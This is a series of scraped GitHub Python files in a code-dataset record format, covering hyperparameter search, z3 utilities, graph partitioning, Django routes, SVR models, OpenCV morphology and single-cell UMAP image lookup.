train_score.place(x=550,y=170)\n\n\n text_box=tk.Entry(canvas1,width=50)\n text_box.insert(END,train)\n text_box.place(x=710,y=175)\n \n \n test_score=tk.Label(canvas1,text=\"Test Score: \",font=30)\n test_score.place(x=550,y=220)\n\n text_box1=tk.Entry(canvas1,width=50)\n text_box1.insert(END,test)\n text_box1.place(x=710,y=225)\n \n \n\n\n error_score=tk.Label(canvas1,text=\"error Score: \",font=30)\n error_score.place(x=550,y=270)\n error_box2=tk.Entry(canvas1,width=50)\n error_box2.insert(END,error)\n error_box2.place(x=710,y=275)\n\n\nbutton=tk.Button(canvas1,\n text=\"Cleaning\",\n font=50,\n width=50,\n height=1,\n bg=\"white\",\n fg=\"black\",\n command=draw\n)\ndef cont():\n root.destroy()\n import 
detection\n\n\ncon=tk.Button(canvas1,\n text=\"continue\",\n font=50,\n width=50,\n height=1,\n bg=\"white\",\n fg=\"black\",\n command=cont\n)\ncon.place(x=490,y=390)\n\nbutton_explore.pack(side=TOP, padx=0, pady=60)\nlabel_file_explorer.place(x=490,y=120)\nbutton.place(x=490,y=320)\n\n# Execute tkinter\n\nroot.mainloop()","repo_name":"ManarElSayed0/Detection-of-Pre-Cancer-Cells","sub_path":"pre_processing.py","file_name":"pre_processing.py","file_ext":"py","file_size_in_byte":2933,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"43012590224","text":"from hyperopt import fmin, tpe, hp, Trials, rand\nfrom hyperopt import STATUS_OK\nfrom sklearn.model_selection import cross_val_score\nimport numpy as np\nfrom copy import deepcopy\nfrom ..plottingTool.mltools_plot import cross_validation_plot\n\n\nclass BayesianCV():\n '''\n Bayesian optimization is a probabilistic model based approach for finding the minimum of\n any function that returns a real-value metric.\n\n Args:\n -----\n model: >>> List of model to be tested\n kf: >>> Number of fold\n search_space: >>> File *.txt that contains params' distributions\n task: >>> Flag for 'classification' or 'regression' problem\n n_iter: >>> Optional. Number of iterations of optimization. Default 100.\n plot_loss: >>> Optional. If True plot the comparison between Tpe and Random algorithm. Default False.\n\n\n Return:\n self\n\n '''\n\n def __init__(self, model, kf, search_space, scoring, task,\n n_iter=100, n_jobs=1, plot_loss=False):\n\n self.model = model\n self.kf = kf\n self.search_space = search_space\n self.scoring = scoring\n\n if task == 'regression' or task == 'classification':\n self.task = task\n else:\n raise Exception(\"Error: invalid task. 
Use 'classification' or 'regression'.\")\n\n self.n_iter = n_iter\n self.train_set = None\n self.target_variable = None\n self.n_jobs = n_jobs\n self.plot_loss = plot_loss\n\n def _model_eval(self, hyperparameters, model):\n ''' This function set the hyperparameters to the model and execute cross-validation.\n Return score (mean) results.'''\n model_to_fit = model.set_params(**hyperparameters)\n scoring = 'neg_mean_squared_error' if self.scoring == 'residual_mean_squared_error' else self.scoring\n\n cv_results = cross_val_score(model_to_fit, self.train_set, self.target_variable,\n cv=self.kf, scoring=scoring)\n\n if self.scoring == 'residual_mean_squared_error':\n score = np.sqrt(-cv_results).mean()\n\n else:\n score = cv_results.mean()\n\n return score\n\n def _objective(self, hyperparameters):\n \"\"\"Objective function for Gradient Boosting Machine\n Hyperparameter Optimization\"\"\"\n\n # Keep track of evals\n global ITERATION\n global PROGRESS\n global min_loss_list\n\n model = deepcopy(self.model)\n ITERATION += 1\n\n best_score = self._model_eval(hyperparameters, model)\n if self.task == 'classification':\n loss = 1 - best_score\n else:\n loss = best_score\n\n min_loss_list.append(loss)\n # Display progress\n if ITERATION % PROGRESS == 0:\n print('Iteration: {}, Score: {}.'.format(ITERATION, (round(min(min_loss_list), 4))))\n min_loss_list = []\n\n # Dictionary with information for evaluation\n return {'iteration': ITERATION,\n 'loss': loss,\n 'hyperparameters': hyperparameters,\n 'status': STATUS_OK}\n\n def fit(self, train_set, target_variable):\n self.train_set = train_set\n self.target_variable = target_variable\n\n # This istance save all results of all iteration\n tpe_trials = Trials()\n\n global ITERATION\n ITERATION = 0\n\n global min_loss_list\n min_loss_list = []\n\n global PROGRESS\n PROGRESS = int((self.n_iter) / 10)\n\n best = fmin(fn=self._objective, space=self.search_space,\n algo=tpe.suggest, max_evals=self.n_iter,\n trials=tpe_trials, rstate=np.random.RandomState(50))\n\n tpe_results = tpe_trials.best_trial['result']\n\n self.best_estimator_ = self.model.set_params(**tpe_results['hyperparameters'])\n self.results_ = tpe_trials.results\n\n if self.task == 'classification':\n self.best_score_ = 1 - tpe_results['loss']\n else:\n self.best_score_ = tpe_results['loss']\n\n if self.plot_loss:\n\n rand_trials = Trials()\n ITERATION = 0\n\n best = fmin(fn=self._objective, space=self.search_space,\n algo=rand.suggest, max_evals=self.n_iter,\n trials=rand_trials, rstate=np.random.RandomState(50))\n\n iterations = [x['iteration'] for x in tpe_trials.results]\n loss = [x['loss'] for x in tpe_trials.results]\n\n cross_validation_plot.plotting_iter_res(iterations, loss, title='Tpe Sequence of Values')\n\n iterations = [x['iteration'] for x in rand_trials.results]\n loss = [x['loss'] for x in rand_trials.results]\n\n cross_validation_plot.plotting_iter_res(iterations, loss, title='Random Sequence of Values')\n\n return self\n","repo_name":"Tostox/mltools","sub_path":"mltools/evaluateModels/bayesian_optimization.py","file_name":"bayesian_optimization.py","file_ext":"py","file_size_in_byte":4864,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"21067747762","text":"import z3\n\ndef lemma_to_string(lemma, pred):\n \"\"\"\n convert a lemma returned by get_cover_delta into a string that parse_smt2_string can parse\n \"\"\"\n const_list = [z3.Const(pred.name()+\"_\"+str(j), pred.domain(j)) for j in range(pred.arity())]\n lhs = 
pred(*const_list)\n rhs = z3.substitute_vars(lemma, *(const_list))\n imp = z3.Implies(lhs, rhs)\n forall = z3.ForAll(list(reversed(const_list)), imp)\n lemma_str = \"(assert %s)\"%forall.sexpr()\n print(\"\\toriginal lemma:\", lemma)\n print(\"\\tforall lemma:\", forall.body().arg(1))\n assert lemma == forall.body().arg(1)\n return lemma_str\n\ndef stripQuantifierBlock (expr) :\n \"\"\" strips the outermost quantifier block in a given expression and returns\n the pair (<list of consts replacing the bound vars>,\n <body of the quantifier>)\n\n Example:\n\n assume expr.is_forall ()\n vars, body = strip_quantifier (expr)\n qexpr = z3.ForAll (vars, body)\n assert qexpr.eq (expr)\n \"\"\"\n if not z3.is_quantifier (expr) : return ([], expr)\n consts = list ()\n # outside-in order of variables; z3 numbers variables inside-out but\n # substitutes outside-in\n for i in reversed (range (expr.num_vars ())) :\n v_name = expr.var_name (i)\n v_sort = expr.var_sort (i)\n consts.append (z3.Const (v_name, v_sort))\n matrix = z3.substitute_vars (expr.body (), *consts)\n return (consts, matrix)\n\n\n","repo_name":"nhamlv-55/deepSpacer","sub_path":"metaspacer/utils/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1432,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"13753242397","text":"from transformers.augment_tokens import AugmentTokens\nimport pytest\n\n\n@pytest.mark.parametrize(\n [\"original_tokens\", \"return_previous\", \"expected\"],\n [\n ([\"europa\", \"asia\", \"america\"], \"next\", [\"asia\", \"america\", \"</s>\"]),\n ([\"europa\", \"asia\", \"america\"], \"prev\", [\"<s>\", \"europa\", \"asia\"]),\n ([\"europa\"], \"prev\", [\"<s>\"]),\n ([], \"prev\", []),\n ],\n)\ndef test_augment_tokens_slice_sequence(original_tokens, return_previous, expected):\n # NOTE: the original start/end sentinel strings were lost when markup was stripped from\n # this record; \"<s>\" and \"</s>\" are reconstructed placeholders, not necessarily the\n # repository's actual tokens.\n start_token = \"<s>\"\n end_token = \"</s>\"\n\n augment_tokens = AugmentTokens(\n start_tokens=start_token, end_tokens=end_token, which=return_previous\n )\n\n actual = augment_tokens.slice_sequence(original_tokens)\n\n assert actual == expected\n","repo_name":"thatcsharpguy/vuelax-crf-on-aws","sub_path":"tests/unit/transformers/test_augment_tokens.py","file_name":"test_augment_tokens.py","file_ext":"py","file_size_in_byte":730,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"74214623847","text":"import matplotlib.pyplot as plt\r\n\r\nimport networkx as nx\r\nimport numpy as np\r\nfrom numpy.linalg import norm\r\nfrom sklearn.preprocessing import normalize\r\nfrom sklearn.cluster import KMeans\r\nfrom handler import Handler\r\nimport collections\r\nimport queue\r\nimport operator\r\nimport sys\r\n\r\n\r\npartitionSize = 7\r\n# G = nx.read_graphml(\"graphHML/Osmnx_large_trips_graph_75000.graphml\")\r\n# data = 'trips'\r\nG = nx.read_edgelist('file/edgeTestPickme/edgeList.txt',nodetype=int, data=(('weight',float),))\r\ndata = 'weight'\r\nprint(len(G.nodes()))\r\nweight_size = G.size(weight='weight')\r\nprint(weight_size)\r\nedgeWeight= 0\r\nfor (u,v,d) in G.edges(data=True):\r\n edgeWeight += abs(d[data])\r\nprint(edgeWeight)\r\n\r\nwith open(\"test_5.txt\") as f:\r\n datas = f.read()\r\n# print(data.split(']')[0])\r\npartitionArray = []\r\nfor k in range(0, 238):\r\n partition_data = datas.split('\\n')[k].replace('{','').replace('}', '').split(', ')\r\n\r\n tempartition = []\r\n for i in partition_data:\r\n tempartition.append(int(i))\r\n\r\n partitionArray.append(tempartition)\r\n\r\nadjecencyMatrix,edgecut = Handler.conectivityMatrix(partitionArray,G,data)\r\n# sort the partition array\r\nsorter = []\r\nfor e in partitionArray:\r\n sorter.append(len(e))\r\nsorter = np.asarray(sorter)\r\nidSorter = sorter.argsort()[::-1][:]\r\ntempPartitionArray = np.asarray(partitionArray)\r\ntempPartitionArray = tempPartitionArray[idSorter]\r\npartitionArray = []\r\nfor a in tempPartitionArray:\r\n partitionArray.append(a)\r\ntempPartitionArray = partitionArray.copy()\r\n\r\ndict = dict()\r\nfor i in range(0,partitionSize):\r\n dict[i] = 0\r\nupperbound = int(edgeWeight/(partitionSize+1))\r\nprint(edgecut,upperbound)\r\ncondition = True\r\nwhile(condition):\r\n #define partition array\r\n partitionArray = tempPartitionArray.copy()\r\n #zero the dic values\r\n for i in range(0, partitionSize):\r\n dict[i] = 0\r\n # choose the partition to merge begin\r\n part = []\r\n indexer = []\r\n for i in range(0, partitionSize):\r\n p = []\r\n if i == 0:\r\n part.append(p)\r\n id = Handler.partitionRandom(partitionArray, indexer)\r\n part[i].append(partitionArray[id])\r\n del partitionArray[id]\r\n else:\r\n indexer = []\r\n for z in range(0, len(partitionArray)):\r\n id = Handler.partitionRandom(partitionArray, indexer)\r\n indexer.append(id)\r\n if (Handler.edgeConectivity(G, part, partitionArray[id],data) == 0):\r\n part.append(p)\r\n part[i].append(partitionArray[id])\r\n del partitionArray[id]\r\n break\r\n tempPartitionSize = 0\r\n while (len(partitionArray) != 0):\r\n cont = 0\r\n for k in partitionArray:\r\n max, id = 0, -1\r\n #dictionary upper bound\r\n dicUpper = 0\r\n for v in range(0, partitionSize):\r\n dicUpper += dict[v]\r\n\r\n dicUpper = dicUpper / partitionSize\r\n for r in range(0, len(part)):\r\n edgeconectivity = Handler.interPartitionConectivity(G, part[r], k,data)\r\n if (edgeconectivity > max) & (dicUpper > dict[r]):\r\n dicUpper = dict[r]\r\n id = r\r\n max = 
edgeconectivity\r\n if (id == -1):\r\n for r in range(0, len(part)):\r\n edgeconectivity = Handler.interPartitionConectivity(G, part[r], k,data)\r\n if (edgeconectivity > max):\r\n id = r\r\n max = edgeconectivity\r\n if (id != -1):\r\n part[id].append(k)\r\n partTemp = []\r\n for par in part[id]:\r\n for p in par:\r\n partTemp.append(p)\r\n H = G.subgraph(partTemp)\r\n edgeWeight = 0\r\n for (u, v, d) in H.edges(data=True):\r\n edgeWeight += abs(d[data])\r\n dict[id] = edgeWeight\r\n del partitionArray[cont]\r\n cont += 1\r\n\r\n if (len(partitionArray) == tempPartitionSize):\r\n break\r\n tempPartitionSize = len(partitionArray)\r\n\r\n # edgecut is in define threshold\r\n print(len(partitionArray))\r\n if(len(partitionArray)==32):\r\n print(partitionArray)\r\n dicUpper = 0\r\n for v in range(0, partitionSize):\r\n dicUpper += dict[v]\r\n print(dict[v])\r\n\r\n dicUpper = dicUpper/partitionSize\r\n conditionCount = 0\r\n for r in range(0, partitionSize):\r\n if (dicUpper - dicUpper * 0.3 <= dict[r] <= dicUpper + dicUpper * 0.3):\r\n conditionCount += 1\r\n if (conditionCount == partitionSize):\r\n edgeWeight = 0\r\n for z in partitionArray:\r\n h = G.subgraph(z)\r\n for (u, v, d) in h.edges(data=True):\r\n edgeWeight += abs(d[data])\r\n print(edgeWeight)\r\n condition = False\r\n break\r\n\"\"\"\r\npart = []\r\ndegreeMatrix = Handler.degreeMatrix(G,partitionArray)\r\nadjecencyMatrix,edgecut = Handler.conectivityMatrix(partitionArray,G)\r\nprint(adjecencyMatrix)\r\nlaplacian = np.subtract(degreeMatrix,adjecencyMatrix)\r\neigenvalues, eigenvectors = np.linalg.eig(laplacian)\r\n\r\ntempEigenValues = eigenvalues\r\n\r\nidx = tempEigenValues.argsort()[:1][::]\r\neigenValues = tempEigenValues[idx]\r\neigenVectors = eigenvectors[:, idx]\r\nkmeans = KMeans(n_clusters=3, random_state=0).fit(eigenVectors)\r\npart = []\r\nw=0\r\np1, p2,p3 = [], [],[]\r\nfor p in kmeans.labels_:\r\n if (p == 0):\r\n p1.append(partitionArray[w])\r\n elif(p==1):\r\n p2.append(partitionArray[w])\r\n else:\r\n p3.append(partitionArray[w])\r\n w += 1\r\npart.append(p1)\r\npart.append(p2)\r\npart.append(p3)\r\n\r\n\"\"\"\r\n'''\r\nmatrix,edgecut1 = Handler.conectivityMatrix(partitionArray,G)\r\nedgecut2 = 0\r\nput,edgeConectivity = Handler.conectivityMatrix(partitionArray,G)\r\nalpha = Handler.alphaCut(matrix,0)\r\npartitionCount = 1\r\npart =[]\r\nnp.set_printoptions(threshold=np.nan)\r\nindexer = []\r\np1 = []\r\np2 = []\r\np3 = []\r\n#part.append(partitionArray)\r\n#partitioning in to two array\r\nmax , id = 0,0\r\nfor i in range(0,len(partitionArray)):\r\n if len(partitionArray[i])>max:\r\n max = len(partitionArray[i])\r\n id = i\r\npartition = partitionArray[id]\r\np1.append(partition)\r\ndel partitionArray[id]\r\n\r\nmax, id = 0, 0\r\nfor i in range(0, len(partitionArray)):\r\n if len(partitionArray[i]) > max:\r\n max = len(partitionArray[i])\r\n id = i\r\npartition = partitionArray[id]\r\np2.append(partition)\r\ndel partitionArray[id]\r\n\r\nmax, id = 0, 0\r\nfor i in range(0, len(partitionArray)):\r\n if len(partitionArray[i]) > max:\r\n max = len(partitionArray[i])\r\n id = i\r\npartition = partitionArray[id]\r\np3.append(partition)\r\ndel partitionArray[id]\r\ncond = False\r\nwhile(len(partitionArray)!=0):\r\n counter = 0\r\n for r in range(len(partitionArray)-1,-1,-1):\r\n if (Handler.edgeConectivity(G,p1,partitionArray[r])+Handler.edgeConectivity(G,p2,partitionArray[r])+Handler.edgeConectivity(G,p3,partitionArray[r]))==0:\r\n print(\"continue\",len(partitionArray),counter)\r\n 
if(r==0)&(counter==len(partitionArray)-1):\r\n print(partitionArray)\r\n cond = True\r\n break\r\n counter+=1\r\n continue\r\n if (Handler.edgeConectivity(G,p1,partitionArray[r])>=Handler.edgeConectivity(G,p2,partitionArray[r]))&(Handler.edgeConectivity(G,p1,partitionArray[r])>=Handler.edgeConectivity(G,p3,partitionArray[r])):\r\n p1.append(partitionArray[r])\r\n del partitionArray[r]\r\n elif (Handler.edgeConectivity(G,p2,partitionArray[r])>=Handler.edgeConectivity(G,p1,partitionArray[r]))&(Handler.edgeConectivity(G,p2,partitionArray[r])>=Handler.edgeConectivity(G,p3,partitionArray[r])):\r\n p2.append(partitionArray[r])\r\n del partitionArray[r]\r\n elif (Handler.edgeConectivity(G,p3,partitionArray[r])>=Handler.edgeConectivity(G,p1,partitionArray[r]))&(Handler.edgeConectivity(G,p3,partitionArray[r])>=Handler.edgeConectivity(G,p2,partitionArray[r])):\r\n p2.append(partitionArray[r])\r\n del partitionArray[r]\r\n counter-=1\r\n print(len(partitionArray))\r\n if(cond):\r\n break\r\npart.append(p1)\r\npart.append(p2)\r\npart.append(p3)\r\n'''\r\npartition = []\r\nfor p in part:\r\n partTemp = []\r\n for par in p:\r\n for part in par:\r\n partTemp.append(part)\r\n partition.append(partTemp)\r\nfor z in partition:\r\n h = G.subgraph(z)\r\n edgeWeight = 0\r\n for (u, v, d) in h.edges(data=True):\r\n edgeWeight += abs(d['weight'])\r\n print(edgeWeight)\r\nnp.savetxt('test_4.txt', partition,fmt='%r')\r\n\r\n\"\"\"\r\n\r\npos=nx.spring_layout(G)\r\n# edges\r\nnx.draw_networkx_edges(G,pos,\r\n width=1)\r\n# labels\r\nnx.draw_networkx_labels(G,pos,font_size=2,font_family='sans-serif')\r\n\r\nnx.draw_networkx_nodes(G,pos,node_size=1)\r\nplt.show()\r\n\r\n\r\n#show partitioning nodes\r\n\r\nfor i in partition:\r\n\r\n \r\n nx.draw_networkx_nodes(G,pos,nodelist=i,node_size=1)\r\n nx.draw_networkx_labels(G,pos,font_size=2,font_family='sans-serif')\r\n nx.draw_networkx_edges(G,pos,nodelist = i,\r\n width=1)\r\n \r\n \r\n plt.show()\r\n\r\n\"\"\"\r\n\r\n","repo_name":"HADLakmal/Advanced_Alpha_cut","sub_path":"graph_random.py","file_name":"graph_random.py","file_ext":"py","file_size_in_byte":9264,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"19479332350","text":"from django.urls import path,re_path\nfrom .views import *\n\nurlpatterns = [\n path('login/',login),\n path('logout/',logout),\n path('register/',register),\n path('tables/', tables),\n path('index/', index),\n path('about/', about),\n path('goods_add/', goods_add),\n path('get_code/', get_code),\n re_path('tables/(?P\\d+)/(?P\\d+)/', tables),\n re_path('tables/(?P\\d+)/(?P\\w+)/', goods_status),\n\n]\n","repo_name":"ltt1997/Djingo1118","sub_path":"Qshop/Sheller/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":443,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"38389747170","text":"from utility.module import *\r\nfrom utility.constant import *\r\nfrom utility.setting import *\r\nimport utility.gloabl_values as g\r\n\r\nfrom machine_learning.tools.metrics import *\r\nfrom machine_learning.model.base_model import *\r\n\r\nclass MySupportVectorRegression(BaseMyModel):\r\n def __init__(self, i, svr_kernel_name) -> None:\r\n super().__init__(i)\r\n self.name = svr_kernel_name\r\n self.gsr_flg = False\r\n self.bayse_flg = False \r\n\r\n def fit(self, x, y):\r\n if self.gsr_flg:\r\n print(self.gsr.best_params_)\r\n self.mdl = svm.SVR(**self.gsr.best_params_)\r\n elif self.bayse_flg:\r\n self.mdl = 
svm.SVR(**self.best_params)\r\n else:\r\n self.mdl = svm.SVR()\r\n self.mdl.fit(x, y)\r\n self.x_train_var = np.var(x)\r\n\r\n def bayse_search(self, x, y):\r\n base_param = {\r\n 'kernel': search_params[self.name]['kernel'][0]\r\n }\r\n searcher = BayseSearch(x, y, base_param)\r\n self.best_params = searcher.fit()\r\n self.bayse_flg = True\r\n \r\n def grid_search(self, x, y):\r\n kf = KFold(n_splits=n_split)\r\n self.gsr = GridSearchCV(\r\n svm.SVR(),\r\n search_params[self.name],\r\n scoring=make_scorer(RMSE, greater_is_better=False),\r\n return_train_score=True,\r\n n_jobs=-1,\r\n cv = kf,\r\n verbose=3\r\n )\r\n self.gsr.fit(x, y)\r\n self.gsr_flg = True\r\n\r\n def set_parameter(self):\r\n self.sv = np.array(self.mdl.support_vectors_)\r\n self.n_sv = len(self.sv)\r\n self.coef = self.mdl.dual_coef_[0]\r\n self.ic = self.mdl.intercept_[0]\r\n self.gamma = 1 / (g.n_feature * self.x_train_var)\r\n self.degree = self.mdl.degree\r\n self.coef0 = self.mdl.coef0\r\n\r\n def set_parameter_for_opt(self, s):\r\n if g.select_ml == SVRLINEAR:\r\n calced_list = []\r\n for i in range(self.n_sv):\r\n sum_value = 0\r\n for j in range(g.n_environment_s):\r\n s_total_index = j + g.n_user_available_x\r\n sum_value += s[j] * self.sv[i][s_total_index]\r\n calced_list.append(sum_value)\r\n self.ic_by_kernel = calced_list\r\n\r\n def predict(self, x):\r\n return self.mdl.predict(x)\r\n\r\n def predict_manual(self, x):\r\n kernel_value = []\r\n if self.name == SVRLINEAR:\r\n for i in range(self.n_sv):\r\n sum_value = 0\r\n for j in range(len(x)):\r\n sum_value += x[j] * self.sv[i][j]\r\n kernel_value.append(sum_value)\r\n elif self.name == SVRPOLY:\r\n for i in range(self.n_sv):\r\n sum_value = 0\r\n for j in range(len(x)):\r\n sum_value += x[j] * self.sv[i][j]\r\n sum_value *= self.gamma\r\n sum_value += self.coef0\r\n sum_value = sum_value ** self.degree\r\n kernel_value.append(sum_value)\r\n elif self.name == SVRGAUSS:\r\n for i in range(self.n_sv):\r\n exp_value = 0\r\n for j in range(len(x)):\r\n exp_value += (x[j] - self.sv[i][j]) ** 2\r\n kernel_value.append(np.exp(-self.gamma * (exp_value)))\r\n ans = np.sum(np.array([self.coef[i] * kernel_value[i] for i in range(self.n_sv)])) + self.ic\r\n return ans\r\n\r\n\r\nclass BayseSearch():\r\n def __init__(self, data_train, label_train, base_param):\r\n self.data_train = data_train\r\n self.label_train = label_train\r\n self.base_param = base_param\r\n\r\n def objective(self, trial):\r\n params = {\r\n 'C': trial.suggest_float('C', 0, 3),\r\n 'epsilon': trial.suggest_float('epsilon', 0, 3)\r\n }\r\n if g.select_ml == SVRPOLY:\r\n params['degree'] = trial.suggest_int('degree', 2, 10)\r\n\r\n params.update(self.base_param)\r\n \r\n model = svm.SVR(**params)\r\n kf = KFold(n_splits=n_split, shuffle=True, random_state=g.seed)\r\n scores = cross_validate(model, X=self.data_train, y=self.label_train, scoring=make_scorer(RMSE), cv=kf)\r\n print(f\"val score:{scores['test_score'].mean()}\")\r\n return scores['test_score'].mean()\r\n\r\n def fit(self):\r\n study = optuna.create_study(direction='minimize',sampler=optuna.samplers.TPESampler(seed=g.seed))\r\n study.optimize(self.objective, n_trials=n_trial)\r\n\r\n best_params = study.best_params\r\n \r\n params = self.base_param\r\n params.update(best_params)\r\n print(study.best_value)\r\n return params\r\n\r\n\r\nsearch_params = {}\r\nsearch_params[SVRLINEAR] = {\r\n 'kernel':[\"linear\"],\r\n 'C' : [0.1, 0.5, 1],#正則化パラメーター。正則化の強さはCに反比例します。厳密に正でなければなりません。ペナルティは、l2ペナルティの2乗です。\r\n 'epsilon': [0.1, 0.25, 0.5, 0.75, 
1],#イプシロン-SVRモデルのイプシロン。これは、トレーニング損失関数でペナルティが実際の値からイプシロンの距離内で予測されたポイントに関連付けられていないイプシロンチューブを指定します。\r\n}\r\nsearch_params[SVRPOLY] = {\r\n 'kernel':[\"poly\"],\r\n 'degree':[2, 3, 4, 5],\r\n 'C' : [0.5, 1, 3, 5],#正則化パラメーター。正則化の強さはCに反比例します。厳密に正でなければなりません。ペナルティは、l2ペナルティの2乗です。\r\n 'epsilon': [0.1, 0.5, 1, 3],#イプシロン-SVRモデルのイプシロン。これは、トレーニング損失関数でペナルティが実際の値からイプシロンの距離内で予測されたポイントに関連付けられていないイプシロンチューブを指定します。\r\n}\r\nsearch_params[SVRGAUSS] = {\r\n 'kernel':[\"rbf\"],\r\n 'degree':[1], \r\n 'C' : [0.1, 0.5, 1, 2, 3, 4, 5],#正則化パラメーター。正則化の強さはCに反比例します。厳密に正でなければなりません。ペナルティは、l2ペナルティの2乗です。\r\n 'epsilon': [0, 0.1, 0.5, 1, 2, 3],#イプシロン-SVRモデルのイプシロン。これは、トレーニング損失関数でペナルティが実際の値からイプシロンの距離内で予測されたポイントに関連付けられていないイプシロンチューブを指定します。\r\n}\r\n","repo_name":"tokyotech-nakatalab/ApproximateFrankWolfe","sub_path":"machine_learning/model/supportvector_regression.py","file_name":"supportvector_regression.py","file_ext":"py","file_size_in_byte":6456,"program_lang":"python","lang":"ja","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"71666604968","text":"###############################################################################\n# Morfolojik İşlemler\n###############################################################################\n\nimport argparse\nimport cv2\n\n\"\"\"\nkodun bulduğu kaynak dosyasına girip oradan ,\n-->python dosyaİsmi.py --image(key) resimİsmi.png(value)\n\nyapabilirsiniz.\n\"\"\"\n\n\n\nap=argparse.ArgumentParser()\nap.add_argument(\"-i\",\"--image\",required=True,help=\"path to the input image\")\nargs=vars(ap.parse_args())\n\n\n### ERODE ### \n\nimage = cv2.imread(args[\"image\"])\ngray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)\ncv2.imshow(\"Original\", image)\n#Uygulanan erode işleminin resimdeki değişimi\nfor i in range(0, 3):\n\teroded = cv2.erode(gray.copy(), None, iterations=i + 1) #ilk parametre uygulanacak resim, ikinci parametremiz structing element, (None kullanırsanız : 8 tane komşusuna bakıp-(4'lü olanı da vardır. Opsiyonel olarak kendi structing element'inizi kullanabilirsiniz), 3×3'lük bir kernel matrisi kullanılacaktır.)\n #Son parametremiz ise kaç defa uygulanacağıdır.\n\tcv2.imshow(\"Erode işlemi {} defa uygulandi\".format(i + 1), eroded)\n\tcv2.waitKey(0)\n\n\n### DILATION ### \n\ncv2.destroyAllWindows()\ncv2.imshow(\"Original\", image)\n\n\n# Uygulanan dilation işleminin resimdeki değişimi\nfor i in range(0, 3):\n\tdilated = cv2.dilate(gray.copy(), None, iterations=i + 1) #ilk parametre uygulanacak resim, ikinci parametremiz structing element, (None kullanırsanız : 8 tane komşusuna bakıp-(4'lü olanı da vardır. Opsiyonel olarak kendi structing element'inizi kullanabilirsiniz), 3×3'lük bir kernel matrisi kullanılacaktır.)\n #Son parametremiz ise kaç defa uygulanacağıdır.\n\tcv2.imshow(\"Erode işlemi {} defa uygulandi\".format(i + 1), dilated)\n\tcv2.waitKey(0)\n\n\n### OPENING ### \n\n\ncv2.destroyAllWindows()\ncv2.imshow(\"Original\", image)\nkernelSizes = [(3, 3), (5, 5), (7, 7)] #Structing_Element yükseklik ve genişliğini belirtir.\n# Her kernel'in etkisini görmek için:\nfor kernelSize in kernelSizes:\n\t#Kendime bir structing_element oluşturdum.\n\tkernel = cv2.getStructuringElement(cv2.MORPH_RECT, kernelSize) #Fonksiyonumuz iki argümanı kabul eder, birincisi structing_elements'in türü. 
İkincisi ise boyutlarıdır.\n #Şayet görüntünü çarpraz bir görüntüden oluşuyorsa : cv2.MORPH_CROSS\n #Yuvarlak bir görüntü için kullanıyorsanız : cv2.MORPH_ELLIPSE gibi tercihler yapabilirsiniz\n\n \n\topening = cv2.morphologyEx(gray, cv2.MORPH_OPEN, kernel)\n\tcv2.imshow(\"Opening: ({}, {})\".format(kernelSize[0], kernelSize[1]), opening)\n\tcv2.waitKey(0)\n\n#Daha önceden belirttiğimiz gibi karıncalı resimlerde, nesneyi öne çıkarmak isterseniz gayet kullanışlı bir işlemdir.\n\n\n### CLOSING ### \n\ncv2.destroyAllWindows()\ncv2.imshow(\"Original\", image)\n# # Her kernel'in etkisini görmek için:\nfor kernelSize in kernelSizes:\n\t# \n\tkernel = cv2.getStructuringElement(cv2.MORPH_RECT, kernelSize)\n\tclosing = cv2.morphologyEx(gray, cv2.MORPH_CLOSE, kernel)\n\tcv2.imshow(\"Closing: ({}, {})\".format(\n\t\tkernelSize[0], kernelSize[1]), closing)\n\tcv2.waitKey(0)\n\n#Adından da anlaşılacağı gibi, nesnelerin içindeki delikleri kapatmak veya bileşenleri birbirine bağlamak için bir kapatma kullanılır.\n\n\n### Morfolojik Gradyan ### \ncv2.destroyAllWindows()\ncv2.imshow(\"Original\", image)\n\nfor kernelSize in kernelSizes:\n\n kernel = cv2.getStructuringElement(cv2.MORPH_RECT, kernelSize)\n\n gradient = cv2.morphologyEx(gray, cv2.MORPH_GRADIENT, kernel)\n\n gradient=cv2.resize(gradient,(480,480))\n\n cv2.imshow(\"Gradient: ({}, {})\".format(kernelSize[0], kernelSize[1]), gradient)\n\n cv2.waitKey(0)\n\n#Morfolojik gradyan, bir görüntünün genişlemesi ile erozyona uğraması arasındaki farktır.Bu sayede görüntünün kenarlarının bulunmasını sağlayabiliriz\n\n\n\n","repo_name":"Yusuf-Cizlasmak/OpenCv_with_Python","sub_path":"Goruntude_Temel_islemler/MorfolojikIslemler.py","file_name":"MorfolojikIslemler.py","file_ext":"py","file_size_in_byte":3817,"program_lang":"python","lang":"tr","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"10265974749","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# # Find single cell images based on UMAP coordinates\n\n# ## Import libraries\n\n# In[1]:\n\n\nimport pathlib\nimport pandas as pd\nfrom PIL import Image\nimport cv2\nimport os\nimport numpy as np\nimport tifffile as tf\nimport yaml\nimport pprint\n\n\n# ## Set variables and paths\n\n# In[2]:\n\n\n# Load in UMAP + metadata for each single cell as data frame\nUMAP_plate3_df = pd.read_csv(\n pathlib.Path(\"./results/UMAP_localhost230405150001_sc_feature_selected.tsv.gz\"), sep=\"\\t\"\n)\nprint(UMAP_plate3_df.shape)\n\n# Images directory for plate 3\nimages_dir = pathlib.Path(\n \"../../../1.preprocessing_data/Corrected_Images/localhost230405150001/\"\n).resolve(strict=True)\n\n# Output dir for composite and cropped images\noutput_img_dir = pathlib.Path(\"./images\")\noutput_img_dir.mkdir(exist_ok=True)\n\n# Output dirs \ncomp_dir = pathlib.Path(\"./images/composite_imgs\")\ncomp_dir.mkdir(exist_ok=True)\ncrop_dir = pathlib.Path(\"./images/cropped_imgs\")\ncrop_dir.mkdir(exist_ok=True)\n\n# CSV file path to store the data\ncsv_file_path = 